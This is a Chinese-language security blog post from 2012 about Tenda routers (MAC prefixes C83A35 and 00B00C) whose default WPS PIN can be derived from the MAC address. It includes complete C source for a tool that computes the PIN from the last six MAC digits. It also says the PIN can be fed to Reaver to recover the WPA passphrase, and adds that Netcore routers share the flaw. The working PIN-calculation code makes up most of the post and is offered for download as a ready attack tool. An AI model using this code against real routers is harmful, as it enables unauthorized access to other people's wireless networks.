PIN计算新突破:部分腾达路由可直接由MAC计算出默认PIN

四月 7, 2012

如果您的路由前6位MAC地址是C83A35或者00B00C,那么可以直接由软件计算得出PIN。

 

互联网出现相应程序源码,经WiFiBETA等多方验证,证实MAC以00B00C打头的路由也依然可以被计算出PIN。

根据IEEE标准数据库信息,C83A35和00B00C均属于腾达科技旗下的OUI地址,此次受影响的路由包括但不限于腾达W150M等腾达型号的,具备QSS/WPS连接功能的路由。用户可以直接得出PIN密钥,并通过Reaver获取其WPA PSK密钥。

OUI查询结果如下

image

值得一提的是,00B00C 这个OUI在IEEE数据库并查询不到。

WiFiBETA.COM对源码做出少许文本上的修改并提供下载:

源码下载请点击这里,压缩包MD5:512e588f9cb153109863892e124672f5

已编译的EXE文件请直接在命令行下使用。

//Computes PIN code starts with OUI “C83A35″ and “00B00C”
//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.
//Coded by Zhaochunsheng – iBeini.com
//Modified by Lingxi – WiFiBETA.COM

#include <stdio.h>
#include <stdlib.h>

int main()
{

unsigned int wps_pin_checksum(unsigned int pin);
int PIN = 0;

//   printf(“ComputePIN-C83A35\n”);
printf(“Description:\n”);
printf(“If your wireless router MAC address start with \”C83A35\” or \”00B00C\”,\n”);
printf(“type the other six digits, you might be able to get the \n”);
printf(“WPS-PIN of this equipment, please have a try, good luck!\n\n”);
printf(“Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n”);
printf(“Modified by Lingxi – WiFiBETA.COM\n\n”);
//Translated to Chinese
printf(“说明:\n”);
printf(“如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头,\n”);
printf(“输入后六位MAC地址(不分大小写)您或许可以获得该路由的WPS PIN密钥!\n”);
printf(“祝你好运!\n\n”);
printf(“由赵春生编写于2012年4月7日  Http://iBeini.com\n”);
printf(“由灵曦修改并汉化  WiFiBETA.COM\n\n”);
printf(“请输入后六位MAC地址(HEX):\n”);
printf(“Input the last 6 digits of MAC Address(HEX):”);
scanf(“%x”,&PIN);
printf(“您输入的后六位MAC地址是 %X\n”,PIN);
printf(“Last 6 digits of MAC Address(HEX) are: %X\n”,PIN);
printf(“WPS PIN is: %07d%d\n”,PIN%10000000,wps_pin_checksum(PIN%10000000));

return 0;
}

unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}

return (10 – accum % 10) % 10;
}

 

更新:

2012年4月8日20:07

磊科全系列路由器亦存在该算法漏洞

相关信息更新,解决方案请点击这里

Tags: , , ,
Posted in PIN, 无线安全 by Ling Xi

Follow comments via the RSS Feed | 留下评论 | Trackback URL

Leave a comment
11 Comments.

Leave a Reply


[ Ctrl + Enter ]

 
Copyright © 2017 WiFi~BETA | Powered by WordPress  | Theme designed by Evlos  | 本站法律顾问:ITLAW-庄毅雄 | 知识共享许可协议 |